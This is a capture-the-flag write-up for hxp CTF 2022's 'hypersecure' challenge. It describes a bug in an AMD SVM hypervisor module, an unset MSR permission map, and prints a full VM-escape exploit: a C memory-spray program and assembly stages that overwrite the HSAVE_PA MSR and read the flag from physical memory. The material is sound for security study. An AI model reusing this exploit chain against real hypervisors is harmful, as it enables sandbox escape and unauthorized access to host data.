hxp CTF 2022: hypersecure writeup

The challenge implements a hypervisor (HV) based on AMD SVM 1 to sandbox a 4K-large program. The goal is to escape the sandbox (VM-escape), and then read the flag.

Let’s briefly go through the HV implementation. At a high level, the module creates a VM context at load time, receives a 4KiB raw binary from userspace, and then executes it from within the sandbox.

For context creation, the HV setups the two-stage translation tables — Guest Page Table (GPT) and Nested Paged Table (NPT) — where GPT is controlled by the VM and the NPT only by the hypervisor. The NPT maps 4 x 4KiB of Host Physical Memory into the Guest Physical Address space, and the GPT maps 2MiB of contiguous Guest Physical Memory but only first 16KiB would be accessible (rest will cause NPT fault).

The HV setups the Virtual Machine Control Block (VMCB), a block which contains the Control Area and Save Area. The Control Area is intended for directing the CPU Firmware on what’s necessary for the HV for correct and secure virtualization of the VM. This includes information opaque to the VM: what instructions or state changes must be intercepted by the HV, exit information on VM-exit, TSC-management, pointer to the NPT, etc. The Save Area contains CPU context state which gets loaded on entering the VM, and used for storing VM state on exiting the VM. The area contains the RAX, …, RIP, …, CR0, …, segment registers, etc.

Similarly, the HV’s state is stored into an area, called HSAVE, pointed to by the HSAVE_PA MSR. The format of the HSAVE area is implementation-defined, but QEMU reuses the same format as the VMCB Save Area 3.

When setting up the Control Block, the HV marks instructions for interception: hlt, vmmcall, vmrun, IO access, MSR access, etc. If IO access were allowed, the VM could potentially attack the HV via some device, read the flag off disk, etc. For this, the HV setups a block of memory — IO Permission Map (IOPM) — and writes the blocks’s physical address into the IOPM_BASE_PA field. Each bit specifies if the IO address is intercepted. All bits are set, and thus all IO operations are intercepted.

One of the bugs in the Hypervisor is Model Specific Register (MSR) interception. While it sets the MSR_PROT_INTERCEPT flag in the VMCB, it never sets the MSRPM_BASE_PA value which means that firmware will use the first 12KiB starting at Host Physical Address 0. This region is reserved for IO, and QEMU still respects the returned bits when region is used for the MSR Permission Map. The bits at this memory range are NOT all zeroes, but are mostly zeroes which gives access to a wide range for MSRs.

This is a severe security bug because MSRs control hardware state and can lead to easy VM escapes. MSRs are mostly architecture dependent, and not all necessarily documented. For reference, here are the publicly knowns MSRs from AMD 4.

Now, how to pwn?

There’s surely more than one way to do it, but the author’s exploit relies on overwriting the HSAVE_PA MSR to load a forged HV’s state when the VM exits. Since the HSAVE area contains all CPU context register state, the attacker would be in full control of the HV.

For a successful exploit, the attacker needs to ensure two things: that the memory pointed to by HSAVE_PA is attacker controlled, and that the HV is restored into a valid state after VM-exit.

For the latter, the VMCB could be setup to operate in real mode and the payload could be embedded into the VMCB itself since we know the physical address of the crafted VMCB. While in real mode, the code can still use 32-bit addressing via the 0x66 and 0x67 instruction prefixes. All that is necessary is to find the flag in physical memory (rootfs) and then print it out via IO (no longer intercepted).

Ok, but how do we ensure that the new HSAVE_PA points to a controlled page? Spray physical memory by mmap-ing a lot of memory and copying the exact pattern for each page. The exploit succeeds most of the time because most of memory is actually free so early after boot.

Userspace program:

#define NEW_HSAVE_PA 0x8000000
#define PAYLOAD_OFF 0x600

static void write_vmcb(void *data) {
        memset(data, 0, 0x1000);
        struct hypersecure_vmcb *vmcb = (struct hypersecure_vmcb *)data;
        _Static_assert(sizeof(*vmcb) <= 0x1000, "aha");
        vmcb->save.rip = NEW_HSAVE_PA + PAYLOAD_OFF;
}

static void write_second_stage(void *data) {
        memcpy(data, second_stage_bin, second_stage_bin_len);
}

int main() {
        int hyper_secure_fd;
        int ret;
        // Spray physical memory with fake VMCBs.
        size_t sz = 1024 * 1024 * 150;
        void *data = mmap(0, sz, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
        if (data == MAP_FAILED) {
                fprintf(stderr, "failed to map memory\n");
                return -1;
        }
        for (size_t i = 0; i < sz; i += 0x1000) {
                write_vmcb((unsigned char *)data + i);
                write_second_stage((unsigned char *)data + i + PAYLOAD_OFF);
        }
        if ((hyper_secure_fd = open("/dev/hypersecure", O_RDWR)) < 0) {
                        fprintf(stderr, "Failed to open hyper-secure connection\n");
                        exit(-1);
        }
        // Load blob and run sandbox.
        if ((ret = ioctl(hyper_secure_fd, 0x1337, first_stage_bin)) < 0) {
                        fprintf(stderr, "Failed to load and run: %d. Errno: %d\n", ret, errno);
                        exit(-1);
        }
        return 0;
}

First stage in VM:

[BITS 64]
[ORG 0x3000]

; Update the HSAVE_PA MSR because it's not marked as interception at all
mov ecx, 0xc0010117
mov eax, 0x8000000
wrmsr

; cause exit to cause "CPU" to use to the new HSAVE_PA which we control
hlt

Second stage after escape:

[BITS 16]
[ORG 0x8000600]

mov edi, 0x8000
mov esi, .third_stage

; Avoid relative jumps because the address past 16 bits is cut off.
%rep 80
mov eax, [esi]
mov [edi], eax
add esi, 4
add edi, 4
%endrep

; jump to final stage
mov edi, 0x8000
jmp edi

; I couldn't figure out how to do a relative jump with extended mode
; The code below will be just copied over to 0x8000 to then comfortably
; search for the flag and print it out.

.third_stage:
; A reasonable physical start address
mov esi, 0x2000000

.loop:
mov eax, [esi]
cmp eax, 0x7b707868
je .done
add esi, 0x1000
cmp esi, 0x3000000
jl .loop

.done:

; print flag to serial
mov ecx, 0x40
.print:
xor eax, eax
mov al, [esi]
mov edx, 0x3f8
out dx, ax
inc esi
loop .print

; shutdown
hlt

The hypervisor project is really a fork of my dumb hobby technical project 2.